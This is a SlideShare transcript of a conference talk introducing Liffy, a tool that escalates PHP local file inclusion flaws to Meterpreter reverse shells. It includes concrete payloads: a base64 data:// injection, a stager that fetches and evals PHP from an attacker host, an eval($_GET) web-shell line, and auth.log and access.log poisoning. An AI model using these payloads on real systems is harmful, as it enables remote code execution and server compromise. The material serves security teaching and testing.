From Ashy To Classy
LFI Exploitation with Liffy
Agenda
File Inclusion Vulnerability History and Overview
Liffy Introduction
Techniques
Considerations
Future Development
2
#whoami
Application Security Practice Manager
@VerSprite – We love product security!
I <3 Python and Java
Enterprise WebAp...
LFI History and Overview
What is it?
“The process of including files, that are already locally present on the server,
thro...
LFI History and Overview
GitHub LULZ
5
LFI History and Overview
File Inclusion Vulnerabilities have been around forever! 2002?
Around 340 “Inclusion” related ent...
Liffy Introduction
A tool that attempts to take a seemingly “read-only” LFI vulnerability into
a full blown PHP Meterprete...
Liffy Feature Overview
data:// - stream wrapper (code execution)
php://input – stream wrapper (code execution)
php://filte...
Payload Generation
Leverages msfpayload
PHP Meterpreter Reverse TCP
Liffy allows you to set specify your own LHOST and LPO...
Direct & Staged Payloads
This simply means directly executing your payload, or using additional code
to download and execu...
Techniques: data://
RFC 2397 – data URL scheme
“ Allows the inclusion of small data items as “immediate” data, as if it ha...
Techniques: data://
How do we use this?
http://target.com/lfi.php?file=data://text/html;base64,
PD9waHAgc3lzdGVtKCd3aG9hbW...
Techniques: data://
How does Liffy use this?
Non-Staged:
Generate payload with msfpayload and resource file
Read payload f...
Techniques: data:// > DEMO!
14
Techniques: php://input
Read-only stream wrapper
Used in POST requests, allows you to read the response data
Restricted by...
Techniques: php://input
How does Liffy implement this technique?
Exactly the same as data://
Staged and Non-Staged Approac...
Techniques: php://input > DEMO!
17
Techniques: SSH auth.log Poisoning
Assumes you can include the SSH auth.log
If you can there is a usually a misconfigurati...
Techniques: SSH auth.log Poisoning
Assumes you can include the SSH auth.log
If you can there is a usually a misconfigurati...
Techniques: SSH auth.log Poisoning
Liffy implements by creating a payload through msfpayload
Reads the PHP payload and ass...
Techniques: SSH auth.log Poisoning > DEMO!
21
Techniques: Apache access.log Poisoning
Requires being able to include the access.log, which means you might
have to ../.....
Techniques: Apache access.log Poisoning
If the log location isn’t different (you should know this), Liffy defaults to
the ...
Techniques: Apache access.log Poisoning >
DEMO!
24
Techniques: php://filter
Wrapper that supports permitting the application of filters to a stream
when you opened
Takes a r...
Techniques: php://filter
Liffy automates this for you!
Prompts you for a file that you want to read
Decodes the encoded st...
Techniques: php://filter > DEMO!
27
Future Work
Make the internal web server smarter and more reliable
Better Object Oriented design
Re-write the command-line...
From Ashy To Classy | LFI Exploitation with Liffy
Upcoming SlideShare
Loading in...5
×

From Ashy To Classy | LFI Exploitation with Liffy

381

Published on

From Ashy To Classy | LFI Exploitation with Liffy

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
381
On Slideshare
0
From Embeds
0
Number of Embeds
4
Actions
Shares
0
Downloads
2
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

From Ashy To Classy | LFI Exploitation with Liffy

  1. 1. From Ashy To Classy LFI Exploitation with Liffy
  2. 2. Agenda File Inclusion Vulnerability History and Overview Liffy Introduction Techniques Considerations Future Development 2
  3. 3. #whoami Application Security Practice Manager @VerSprite – We love product security! I <3 Python and Java Enterprise WebApp Background CTF player and boot2rooter Twitters: @rotlogix Personal Blog: http://rotlogix.com 3
  4. 4. LFI History and Overview What is it? “The process of including files, that are already locally present on the server, through the exploiting of vulnerable inclusion procedures implemented in the application.” – https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion Issues with include(), and require() > untrusted code evaluation Example <?php include($_GET[‘file’]); ?> = http://target/find.php?file=/etc/passwd <?php “files/”.include($_GET[‘file’].”.php”); ?> = Requires traversal “../../ “ and null byte %00 The problem is passing a URL parameter which is user controlled as the file argument for an include or require statement. 4
  5. 5. LFI History and Overview GitHub LULZ 5
  6. 6. LFI History and Overview File Inclusion Vulnerabilities have been around forever! 2002? Around 340 “Inclusion” related entries on Exploit-DB over the last 5 years Vulnerability dropped from OWASP Top 10 in 2010 My Opinion? Doesn’t matter. Consider all the legacy PHP written applications, plugin development for things like Wordpress 6
  7. 7. Liffy Introduction A tool that attempts to take a seemingly “read-only” LFI vulnerability into a full blown PHP Meterpreter web shell Developed in Python Currently has 10 features, which we will discuss Using Python’s SimpleHTTPServer library to spawn as needed web serving for payload staging Major enhancements added by Dan ‘unicornFurnace’ Crowley @SpiderLabs 7
  8. 8. Liffy Feature Overview data:// - stream wrapper (code execution) php://input – stream wrapper (code execution) php://filter – stream wrapper (file reads) php://expect – process control extension (code execution) /proc/self/environ – CGI mode (code execution Apache access log poisoning (code execution) Linux auth log poisoning (code execution) Support for absolute and relative paths (log poisoning) Support for cookies Direct or staged payload delivery 8
  9. 9. Payload Generation Leverages msfpayload PHP Meterpreter Reverse TCP Liffy allows you to set specify your own LHOST and LPORT for the Meterpreter Creates corresponding resource file which loads a multi-handler 9
  10. 10. Direct & Staged Payloads This simply means directly executing your payload, or using additional code to download and execute your payload through the chosen technique (data://, php://input, etc) Staged Delivery Generate PHP Meterpreter through msfpayload (Stored: /tmp/{random}.php) Encode and use "<?php eval(file_get_contents(‘http://local:8000/{random}.php’))?> Spawn temporary web server to host shell out of /tmp directory Stager downloads and executes shell Listening handler catches reverse shell Direct Delivery Generate PHP Meterpreter through msfpayload (Stored: /tmp/{random}.php) Read payload from stored file (/tmp/{random}.php) Encode and send directly through wrapper – data://text/html;base64,{payload} Listening handler catches reverse shell 10
  11. 11. Techniques: data:// RFC 2397 – data URL scheme “ Allows the inclusion of small data items as “immediate” data, as if it had been included externally” Stream wrapper supported since PHP 5.2.0 Usage: data://text/html;base64,{encoded code here} Restricted by allow_url_include (enabled / disabled) Set in php.ini If enabled you would potentially have an RFI as well “ Allows the use of URL-aware file open wrappers with functions like include” 11
  12. 12. Techniques: data:// How do we use this? http://target.com/lfi.php?file=data://text/html;base64, PD9waHAgc3lzdGVtKCd3aG9hbWknKTsgPz4= <?php system(‘whoami’); ?> = PD9waHAgc3lzdGVtKCd3aG9hbWknKTsgPz4= 12
  13. 13. Techniques: data:// How does Liffy use this? Non-Staged: Generate payload with msfpayload and resource file Read payload from generated file Encode the payload Load listening handler for reverse connections Deliver it directly data://text/html;base64, {payload} Staged: Generate payload with msfpayload and resource file Encode <?php eval(file_get_contents(‘http://attacker/:8000/{shell}.php’))?> Load listening handler for reverse connections Spawn web server to host payload Execute 13
  14. 14. Techniques: data:// > DEMO! 14
  15. 15. Techniques: php://input Read-only stream wrapper Used in POST requests, allows you to read the response data Restricted by allow_url_include Example: 15
  16. 16. Techniques: php://input How does Liffy implement this technique? Exactly the same as data:// Staged and Non-Staged Approach Really you should always chose Non-Staged in this scenario POST (direct delivery) = Non-Staged 16
  17. 17. Techniques: php://input > DEMO! 17
  18. 18. Techniques: SSH auth.log Poisoning Assumes you can include the SSH auth.log If you can there is a usually a misconfiguration issue! The process of injecting PHP code through a failed login attempts Code now appears in the auth.log Include auth.log for code execution! 18
  19. 19. Techniques: SSH auth.log Poisoning Assumes you can include the SSH auth.log If you can there is a usually a misconfiguration issue! The process of injecting PHP code through a failed login attempts Code now appears in the auth.log Include auth.log for code execution! 19
  20. 20. Techniques: SSH auth.log Poisoning Liffy implements by creating a payload through msfpayload Reads the PHP payload and assigns to “payload_1” Uses <?php eval($_GET[‘code’])?> as “payload_2” The second payload is used to poison the auth.log The first payload is what is called after the final inclusion “&code=“ Supports path traversal sequences if needed > “../, .., /../ “ 20
  21. 21. Techniques: SSH auth.log Poisoning > DEMO! 21
  22. 22. Techniques: Apache access.log Poisoning Requires being able to include the access.log, which means you might have to ../../../ (/var/log/apache2/access.log) Poison logs through the User-Agent by injecting PHP code Include the access.log and your PHP code get’s evaluated 22
  23. 23. Techniques: Apache access.log Poisoning If the log location isn’t different (you should know this), Liffy defaults to the most common location Supports path traversal as we already saw with the auth.log Payload is creation is the same, but with only direct delivery Encodes the payload in base64 and uses eval(base64_decode()); to get around double or single quotes causing parse errors Again everything gets delivered through the User-Agent 23
  24. 24. Techniques: Apache access.log Poisoning > DEMO! 24
  25. 25. Techniques: php://filter Wrapper that supports permitting the application of filters to a stream when you opened Takes a resource argument, which is what you want to read Used in conjunction with base64 encoding “Conversion Filter” Takes the resource > streams and reads the data > converts to base64 > output is an base64 encoded string Example: http://target.com/vuln/lfi.php?file=php://filter/convert.base64-encode/resource=lfi.php 25
  26. 26. Techniques: php://filter Liffy automates this for you! Prompts you for a file that you want to read Decodes the encoded string and echo's the contents back to the terminal Useful for viewing PHP source from files you have access to 26
  27. 27. Techniques: php://filter > DEMO! 27
  28. 28. Future Work Make the internal web server smarter and more reliable Better Object Oriented design Re-write the command-line interface Dynamic request object building and re-use for everything HTTP Support bypassing filters for path traversals Write custom PHP reverse shell with built-in handler 28
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×